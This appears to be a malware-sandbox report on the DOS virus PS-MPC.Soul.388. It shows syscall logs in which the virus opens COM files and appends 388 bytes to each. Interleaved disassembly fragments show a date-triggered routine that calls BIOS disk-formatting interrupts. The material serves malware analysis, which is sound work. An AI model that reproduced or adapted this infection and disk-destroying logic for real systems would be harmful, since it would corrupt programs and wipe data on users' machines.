Sample viewer

vx.netlux.org/Virus.DOS.PS-MPC.Soul.388

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:56:46.49833992Z 26 PC: 12bae | Set disk transfer address
2018-12-17T21:56:46.499659713Z 78 PC: 12ac9 | Find first file
2018-12-17T21:56:46.505424896Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:56:46.509997851Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:46.514238149Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:46.515182579Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:56:46.516835844Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:46.518254455Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-17T21:56:47.380698845Z 62 PC: 12b23 | Close file
2018-12-17T21:56:47.388687621Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-17T21:56:47.391406793Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-17T21:56:47.393761548Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
0x12b79: mov ch, byte ptr cs:[0x216]
0x12b7e: mov cl, byte ptr cs:[0x216]
0x12b83: mov dh, 0
0x12b85: mov dl, byte ptr cs:[0x217]
0x12b8a: int 0x13
0x12b8c: in al, 0x21
2018-12-17T21:56:47.398093888Z 79 PC: 12ac9 | Find next file
2018-12-17T21:56:47.402186987Z 61 PC: 12ad4 | Open file (Filename = 'PRINT.COM')
2018-12-17T21:56:47.40876545Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:47.414898284Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.416816879Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:56:47.41951464Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.42082384Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-17T21:56:47.423938887Z 62 PC: 12b23 | Close file
2018-12-17T21:56:47.432138789Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-17T21:56:47.434656813Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-17T21:56:47.438480394Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
0x12b79: mov ch, byte ptr cs:[0x216]
0x12b7e: mov cl, byte ptr cs:[0x216]
0x12b83: mov dh, 0
0x12b85: mov dl, byte ptr cs:[0x217]
0x12b8a: int 0x13
0x12b8c: in al, 0x21
2018-12-17T21:56:47.440836498Z 79 PC: 12ac9 | Find next file
2018-12-17T21:56:47.443767149Z 61 PC: 12ad4 | Open file (Filename = 'HELLO.COM')
2018-12-17T21:56:47.451362399Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:47.457889273Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.459433014Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:56:47.462404Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.464230934Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-17T21:56:47.467165069Z 62 PC: 12b23 | Close file
2018-12-17T21:56:47.474765444Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-17T21:56:47.476668852Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-17T21:56:47.478199686Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
0x12b79: mov ch, byte ptr cs:[0x216]
0x12b7e: mov cl, byte ptr cs:[0x216]
0x12b83: mov dh, 0
0x12b85: mov dl, byte ptr cs:[0x217]
0x12b8a: int 0x13
0x12b8c: in al, 0x21
2018-12-17T21:56:47.479934776Z 79 PC: 12ac9 | Find next file
2018-12-17T21:56:47.483289842Z 61 PC: 12ad4 | Open file (Filename = 'PHANG.COM')
2018-12-17T21:56:47.487514135Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:47.492092132Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.493552094Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:56:47.495376739Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.497028536Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-17T21:56:47.499259525Z 62 PC: 12b23 | Close file
2018-12-17T21:56:47.504091507Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-17T21:56:47.50560751Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-17T21:56:47.507869974Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
0x12b79: mov ch, byte ptr cs:[0x216]
0x12b7e: mov cl, byte ptr cs:[0x216]
0x12b83: mov dh, 0
0x12b85: mov dl, byte ptr cs:[0x217]
0x12b8a: int 0x13
0x12b8c: in al, 0x21
2018-12-17T21:56:47.510003514Z 79 PC: 12ac9 | Find next file
2018-12-17T21:56:47.512473782Z 61 PC: 12ad4 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T21:56:47.519348785Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:47.525729395Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.527840906Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:56:47.530948067Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.53225333Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-17T21:56:47.534826456Z 62 PC: 12b23 | Close file
2018-12-17T21:56:47.543472685Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-17T21:56:47.545604883Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-17T21:56:47.547720034Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
0x12b79: mov ch, byte ptr cs:[0x216]
0x12b7e: mov cl, byte ptr cs:[0x216]
0x12b83: mov dh, 0
0x12b85: mov dl, byte ptr cs:[0x217]
0x12b8a: int 0x13
0x12b8c: in al, 0x21
2018-12-17T21:56:47.550642448Z 79 PC: 12ac9 | Find next file
2018-12-17T21:56:47.552303842Z 61 PC: 12ad4 | Open file (Filename = 'MANDEL.COM')
2018-12-17T21:56:47.556574408Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:47.572173263Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.573297988Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:56:47.575666562Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.577294495Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-17T21:56:47.585019155Z 62 PC: 12b23 | Close file
2018-12-17T21:56:47.592767818Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-17T21:56:47.596642902Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-17T21:56:47.598862798Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
0x12b79: mov ch, byte ptr cs:[0x216]
0x12b7e: mov cl, byte ptr cs:[0x216]
0x12b83: mov dh, 0
0x12b85: mov dl, byte ptr cs:[0x217]
0x12b8a: int 0x13
0x12b8c: in al, 0x21
2018-12-17T21:56:47.601173253Z 79 PC: 12ac9 | Find next file
2018-12-17T21:56:47.604602757Z 61 PC: 12ad4 | Open file (Filename = 'PAH.COM')
2018-12-17T21:56:47.612157709Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:47.618698124Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.621083999Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:56:47.624252197Z 66 PC: 12bb6 | Move file pointer
2018-12-17T21:56:47.625960987Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-17T21:56:47.629386805Z 62 PC: 12b23 | Close file
2018-12-17T21:56:47.63685264Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-17T21:56:47.639010937Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-17T21:56:47.641272156Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
0x12b79: mov ch, byte ptr cs:[0x216]
0x12b7e: mov cl, byte ptr cs:[0x216]
0x12b83: mov dh, 0
0x12b85: mov dl, byte ptr cs:[0x217]
0x12b8a: int 0x13
0x12b8c: in al, 0x21
2018-12-17T21:56:47.643806573Z 79 PC: 12ac9 | Find next file
2018-12-17T21:56:47.646204557Z 61 PC: 12ad4 | Open file (Filename = 'TEST.COM')
2018-12-17T21:56:47.652522912Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:56:47.655289985Z 62 PC: 12b23 | Close file
2018-12-17T21:56:47.657272639Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-17T21:56:47.659214409Z 42 PC: 12b3f | Get date 0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
2018-12-17T21:56:47.661469952Z 42 PC: 12b4d | Get date 0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
0x12b66: mov ah, 0x4f
0x12b68: je 0x12b25
0x12b6a: inc byte ptr cs:[0x217]
0x12b6f: mov byte ptr cs:[0x216], 0
0x12b75: loop 0x12b59
0x12b77: mov ah, 5
0x12b79: mov ch, byte ptr cs:[0x216]
0x12b7e: mov cl, byte ptr cs:[0x216]
0x12b83: mov dh, 0
0x12b85: mov dl, byte ptr cs:[0x217]
0x12b8a: int 0x13
0x12b8c: in al, 0x21
2018-12-17T21:56:47.663510003Z 79 PC: 12ac9 | Find next file
2018-12-17T21:56:47.665828468Z 26 PC: 12bae | Set disk transfer address
2018-12-17T21:56:47.667492287Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":735,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:46.890465264Z 26 PC: 12bae | Set disk transfer address
2018-12-25T11:41:46.891572257Z 78 PC: 12ac9 | Find first file
2018-12-25T11:41:46.898797974Z 61 PC: 12ad4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:46.905920872Z 63 PC: 12ae0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:41:46.912856105Z 66 PC: 12bb6 | Move file pointer
2018-12-25T11:41:46.915088405Z 64 PC: 12b0f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:46.918012534Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:46.919544113Z 64 PC: 12b1f | Write file or device (Write 388 bytes on handle 5)
2018-12-25T11:41:46.935717464Z 62 PC: 12b23 | Close file
2018-12-25T11:41:46.944630004Z 42 PC: 12b31 | Get date 0x12b31: cmp cx, 0x7ca
0x12b35: jge 0x12b3b
0x12b37: mov ah, 0x4f
0x12b39: jmp 0x12ac7
0x12b3b: mov ah, 0x2a
0x12b3d: int 0x21
0x12b3f: cmp dh, 5
0x12b42: jge 0x12b49
0x12b44: mov ah, 0x4f
0x12b46: jmp 0x12ac7
0x12b49: mov ah, 0x2a
0x12b4b: int 0x21
0x12b4d: cmp dl, 0x15
0x12b50: jge 0x12b57
0x12b52: mov ah, 0x4f
0x12b54: jmp 0x12ac7
0x12b57: add al, byte ptr [bx + si]
0x12b59: mov al, byte ptr cs:[0x217]
0x12b5d: call 0x12b77
0x12b60: cmp byte ptr cs:[0x217], 0x9a
2018-12-25T11:41:46.947169541Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:46.951551674Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:46.958978977Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:46.971523641Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:46.974465327Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:46.977517492Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:46.978999398Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:46.981822762Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:46.990647505Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:46.99323846Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:46.996198439Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:47.003824013Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:47.018806769Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.02011005Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:47.023842201Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.025712778Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:47.028937602Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:47.038497792Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:47.041018307Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:47.043969798Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:47.051423987Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:47.058617913Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.060304566Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:47.063161852Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.07291301Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:47.075801583Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:47.084464412Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:47.087421346Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:47.091118396Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:47.098234434Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:47.1056311Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.107200209Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:47.110018383Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.112083403Z 64 PC: 12b1f | Write file or device (See above)
2018-12-25T11:41:47.114890961Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:41:47.123136949Z 42 PC: 12b31 | Get date (See above)
2018-12-25T11:41:47.125950774Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T11:41:47.128878533Z 61 PC: 12ad4 | Open file (See above)
2018-12-25T11:41:47.136086274Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:41:47.143552501Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.145451542Z 64 PC: 12b0f | Write file or device (See above)
2018-12-25T11:41:47.148554277Z 66 PC: 12bb6 | Move file pointer (See above)
2018-12-25T11:41:47.150990166Z 64 PC: 12b1f | Write file or device (See above)
